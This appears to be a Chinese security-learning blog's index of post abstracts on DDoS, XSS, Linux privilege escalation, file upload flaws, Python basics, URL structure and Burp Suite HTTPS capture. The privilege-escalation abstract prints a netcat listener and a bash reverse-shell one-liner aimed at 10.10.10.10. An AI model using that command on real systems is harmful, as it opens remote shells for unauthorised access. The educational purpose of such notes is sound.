摘要:
DDOS(分布式拒绝服务)概念 DDOS称为分布式拒绝服务,DDOS本是利用合理的请求伪造资源过载,导致服务不可用。比如一个停车场有100个停车位,当100个停车位都停满后,再有车想要进来。就必须要等已有的车先出来才行。如果已有的车一直不出去,那么停车场的入口就会排有长队。停车场的负荷过载。不能进行 阅读全文
摘要:
xss(跨站脚本攻击)xss是指攻击者在网页中嵌入客户端脚本,通常是javascript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将在用户的浏览器上被解析执行。重点是“脚本”这两个字,脚本主要有javascript和actionscript。要想深入的研究xss,必须要精通 阅读全文
摘要:
 阅读全文
摘要:
Linux下的漏洞提权 linux下一般都是系统漏洞提权,分为以下几个步骤: 提权 反弹shell 本地:nc -l -p 8000 目标机器:/bin/bash -i >& /dev/tcp/10.10.10.10/8000 0>&1 实例 1、得到系统版本号 centos 7 local roo 阅读全文
摘要:
正则表达式 字符串是编程时涉及到的最多的一种数据结构,对字符串进行操作的需求几乎无处不在。比如判断一个字符串是否是合法的Email地址,虽然可以编程提取@前后的子串,再分别判断是否是但粗和域名,但这样做不但麻烦,而且代码难以复用。 正则表达式是一种用来匹配字符串的强有力的武器。它的设计思想是用一种描 阅读全文
摘要:
文件上传漏洞 权限 漏洞分类 利用条件 漏洞挖掘 常见可执行文件后缀 阅读全文
摘要:
输出标题以及长度 结果 输出网页下方学校地理位置以及 输出”abcdefg”base64编码 输出网页内容的MD5 hash 阅读全文
摘要:
第一个python程序 Python 标示符 python 引号 Python 接收单引号(`),双引号("),三引号( python 小练习 接收命令行参数 处理命令行参数 (python optparse 模块) 格式化输出 阅读全文
摘要:
url的内容及结构: url格式: Schema 协议名称 : 伪协议: // login:password address:服务器地址 port:服务器端口 /path/to/resource:层级文件路径 ?query_string :查询字符串 #fragment:片段ID 相对url url 阅读全文
摘要:
Windows and Phone 处于同一无线环境下 Windows Phone Burp Suite设置 抓http包 抓https包 先导出证书、 下载到手机 burp suite抓包 成功抓到https包 啦啦啦啦啦啦啦啦啦啦啦~ 我是卖报的小行家 阅读全文